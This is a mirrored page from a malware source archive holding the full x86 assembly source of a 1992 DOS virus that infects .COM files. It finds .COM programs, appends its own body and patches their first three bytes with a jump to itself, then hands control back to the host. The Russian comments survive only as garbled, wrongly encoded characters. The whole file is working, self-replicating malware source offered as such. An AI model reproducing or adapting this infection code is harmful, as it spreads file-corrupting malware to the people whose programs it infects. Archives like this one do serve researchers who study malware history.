mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 02:46:10 +00:00
166 lines
4.6 KiB
NASM
166 lines
4.6 KiB
NASM
; Œ «¥ìª¨© (¨«¨ ¡®«ì让) ¢¨àãá, § à ¦ î騩 .COM-¯à®£à ¬¬ë
|
||
; ¯à¨ § ¯ã᪥, ¥á«¨ ã ¨å ¥âã ¢ ç «¥ JMP.
|
||
; <20>஢¥àª¨ ¢á直¥ ¢áïç®á⨠¥ ¯à¨áãâáâ¢ãîâ.
|
||
;
|
||
; Copyright (c) 1992, Gogi&Givi International.
|
||
;
|
||
|
||
.model tiny
|
||
.code
|
||
org 0100h
|
||
start:
|
||
jmp virusstart ; <20>¥à¥å®¤ ¢¨àãá:
|
||
mov ah,09h ; â ª¦¥, ª ª ¡ã¤¥â
|
||
int 21h ; á ¦¥à⢮© ¯à¨
|
||
mov ax,4C00h ; § à ¦¥¨¨
|
||
int 21h
|
||
Message db 'This is little infection... He-he...',13,10,'$'
|
||
; „® á¨å ¯®à ®à¬ «ìë©
|
||
; ª®¤ ¦¥àâ¢ë
|
||
|
||
virusstart: ; € íâ® ¢¨àãá
|
||
pushf
|
||
push ax ; ‘®åà 塞 ¢á¥, çâ®
|
||
push bx ; ⮫쪮 ¬®¦®...
|
||
push cx
|
||
push dx
|
||
push ds ; <20>¥ § î, ᪮«ìª®
|
||
push es ; íâ® ¯à ¢¨«ì®...
|
||
push si
|
||
call SelfPoint
|
||
SelfPoint: ; Ž¯à¥¤¥«ï¥¬ â®çªã
|
||
pop si ; ¢å®¤
|
||
|
||
cld ; „¢¨¦¥¬áï ¢¯à ¢®
|
||
push cs ; <20>®áâ ¢¨¬ ᥣ¬¥âë¥
|
||
pop ds ; ॣ¨áâàë § 票ï
|
||
push cs ; ¨ ®â¯à ¢«¥¨ï
|
||
pop es
|
||
mov di,0100h ; ‚ ¯à¨¥¬¨ª¥ - 0100h,
|
||
push si ; ç «® ¯à®£à ¬¬ë
|
||
add si,original-SelfPoint ; ‘¥©ç á SI 㪠§ë¢ ¥â
|
||
mov cx,3 ; ®à¨£¨ «ìë¥ ¡ ©âë
|
||
rep movsb ; ‘ª®¯¨à㥬 ¨å ¢ ç «®
|
||
pop si ; § à ¦¥®© ¯à®£à ¬¬ë
|
||
|
||
mov ah,1Ah ; <20>®áâ ¢¨¬ ᮡá⢥ãî
|
||
mov dx,si ; DTA ¨§ ª®æ ¢¨àãá
|
||
add dx,VirusDTA-SelfPoint ; 21h ¯à¥àë¢ ¨¥¬
|
||
int 21h
|
||
|
||
mov ah,4Eh ; „¥« ¥¬ FindFirst
|
||
mov dx,si ; á ᮮ⢥âáâ¢ãî饩
|
||
add dx,FileMask-SelfPoint ; ¬ ᪮©
|
||
mov cx,32 ; ¨ âਡã⮬ ç⥨¥/
|
||
int 21h ; § ¯¨áì, çâ®¡ë ¥
|
||
; ¬ã¤à¨âì
|
||
jnc RepeatOpen ; Žè¨¡®ª ¥â - ®âªàë¢ ¥¬
|
||
|
||
jmp OutVirus ; <20>¨§ª® ¯®è¥«...
|
||
|
||
RepeatOpen:
|
||
mov ax,3D02h ; Žâªà®¥¬ ä ©«
|
||
mov dx,si ; ¯à¨ ¯®¬®é¨ à áè¨à¥®£®
|
||
add dx,NameF-SelfPoint ; ã¯à ¢«¥¨ï ®ë¬
|
||
int 21h
|
||
jc OutVirus ; <20>ਠ¢á¥å ®è¨¡ª å ¢ë室¨¬
|
||
|
||
mov bx,ax ; ‚®§ì¬¥¬ ®¬¥à ä ©« ,
|
||
; ¨ ¡ã¤¥¬ ¤¥à¦ âìáï § BX
|
||
|
||
mov ah,3Fh ; ‘ç¨âë¢ ¥¬ áâ®ï騥
|
||
mov dx,si ; ª®¬ ¤ë ¤«ï
|
||
add dx,Original-SelfPoint ; ¨á¯®«¥¨ï
|
||
mov cx,3 ; <20>ãáâì ¡ã¤¥â âਠ¡ ©â
|
||
int 21h
|
||
jc OutVirus ; Ž¯ïâì ¯à®¢¥à¨¬ ®è¨¡ªã...
|
||
push bx
|
||
mov bx,dx
|
||
cmp byte ptr [bx],'é' ; ‚¤à㣠¢ í⮬ ä ©«¥
|
||
pop bx ; ⮦¥ á ç « ¯¥à¥å®¤?
|
||
;
|
||
je CloseNotInfect ; ’®£¤ ¥ § à ¦ âì!
|
||
; Žå, «¥ì ¬¥ ¯®â®ç¥¥
|
||
; ¯à®¢¥àïâì...
|
||
|
||
mov ax,4202h ; <20>àë£ ¥¬ ¢ ª®¥æ
|
||
xor cx,cx ; ¦¥àâ¢ë (¨§ ᨫ®¢ ¨ï)
|
||
xor dx,dx
|
||
int 21h ; ’¥¯¥àì ¢ AX «¥¦¨â
|
||
jc OutVirus ; ¤à¥á ç «
|
||
; ¢¨àãá , ¥á«¨ ¥â,
|
||
; ª®¥ç®, ®è¨¡ª¨
|
||
push ax
|
||
|
||
mov ah,40h ; ‡ ¯¨è¥¬
|
||
mov dx,si ; ⥫® ¢¨àãá
|
||
sub dx,SelfPoint-VirusStart ; ¢ ä ©«-¦¥àâ¢ã
|
||
mov cx,VirusEnd-VirusStart ; Š®«¨ç¥á⢮ ¡ ©â
|
||
int 21h
|
||
|
||
pop ax
|
||
jc OutVirus ; Œ®¦¥â á«ãç¨âìáï ®è¨¡ª -
|
||
; ¤¨áª, â ¬, ¯¥à¥¯®«¥...
|
||
|
||
sub ax,3 ; ‚ëç¨â ¥¬ 3 - ç⮡ë
|
||
push bx ; ¯®¯ áâì Šã¤ <20> ¤®
|
||
mov bx,si
|
||
sub bx,SelfPoint-VirusStart
|
||
mov word ptr cs:[bx+1],ax ; Š« ¤¥¬ ¤à¥á
|
||
mov byte ptr [bx],'é' ; Š®¬ ¤ ¯¥à¥å®¤ (¢
|
||
; ¯à¥¤¥« å ᥣ¬¥â )
|
||
pop bx
|
||
|
||
mov ax,4200h ; € ⥯¥àì ¢ ç «®
|
||
xor cx,cx ; ¦¥àâ¢ë
|
||
xor dx,dx
|
||
int 21h
|
||
jc OutVirus ; <20>஢¥àª ®è¨¡ªã
|
||
|
||
mov ah,40h ; ˆ § ¯¨è¥¬ âã¤
|
||
mov dx,si ; ª®¬ ¤ã ¯¥à¥å®¤
|
||
sub dx,SelfPoint-VirusStart ; è¥ £ãᮥ
|
||
mov cx,3 ; ⥫®
|
||
int 21h
|
||
jc OutVirus ; Ž¯ïâì ¯à®¢¥à¨¬ ®è¨¡ª¨
|
||
|
||
mov ah,3Eh ; ” ©« ¤® § ªàëâì
|
||
int 21h ; (Ž 㦥 § à ¦¥ -
|
||
jmp OutVirus ; ¡®«ìè¥ ¥ à ¡®â ¥¬)
|
||
|
||
CloseNotInfect:
|
||
mov ah,3Eh ; ‡ ªàë¢ ¥¬ ¥¯®¤å®¤ï騩
|
||
int 21h ; ä ©«
|
||
|
||
mov dx,si
|
||
add dx,FileMask-SelfPoint ; ˆ ¤¥« ¥¬ FindNext
|
||
mov ah,4Fh
|
||
int 21h
|
||
jc OutVirus ; Žè¨¡ª - § ç¨â, ¥ áã¤ì¡
|
||
jmp RepeatOpen ; ˆ«¨ ¯¥à¥å®¤ ®âªàë⨥
|
||
|
||
OutVirus:
|
||
pop si ; ˆ, ª®¥ç® ¦¥,
|
||
pop es ; ¢á¥ ᢥâ¥
|
||
pop ds ; ¢®ááâ ®¢¨âì
|
||
pop dx
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
popf
|
||
mov si,0100h ; ‡ ®á¨¬ ¢ á⥪ ¤à¥á
|
||
push si ; ç « ¯à®£à ¬¬ë
|
||
ret ; ¨ ¤¥« ¥¬ RET
|
||
|
||
; <20> è¨ ¤ ë¥:
|
||
|
||
VirusDTA db 30 dup (0) ; <20>â® DTA
|
||
NameF db 13 dup (0) ; ’ã⠡㤥⠨¬ï ä ©«
|
||
FileMask db '*.cOm',(0) ; ‚®â â ª ï ªà ᨢ ï
|
||
; ¬ áª
|
||
original:
|
||
mov dx,offset Message ; € íâ® ®à¨£¨ «ìë¥ ¡ ©âë
|
||
VirusEnd: ; ¨§ ¦¥àâ¢ë (‹®§¨áª¨©,
|
||
; ¥ §¥¢ ©!)
|
||
end start
|